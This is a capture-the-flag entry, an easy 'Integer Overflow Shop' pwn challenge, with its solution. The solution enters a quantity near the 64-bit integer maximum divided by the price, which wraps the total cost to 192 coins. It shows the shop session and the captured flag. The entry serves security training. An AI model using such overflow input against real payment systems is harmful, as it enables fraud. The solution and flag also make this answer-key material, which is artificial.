Difficulty: easy

Category: pwn

Author: xnull

Description:

### Integer Overflow Shop

This shop sells flags for 1000 coins each. You only have 500 coins in your wallet.

Can you exploit an integer overflow to buy the flag anyway?

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

Solution

We can use the max. signed 64-bit integer divided by the cost (9223372036854775807 / 1000) to buy the flag and get an overflow in the cost:

===== Flag Shop =====
Flag price: 1000 coins each
Your wallet: 500 coins

How many flags do you want to buy? 9223372036854776.0
Total cost: 192 coins

Purchase successful!
Here's your flag: ENDLM{5d2b5b1c8225fd535e2bde5e612993d9e055322ccb9d8507}

Flag: ENDLM{5d2b5b1c8225fd535e2bde5e612993d9e055322ccb9d8507}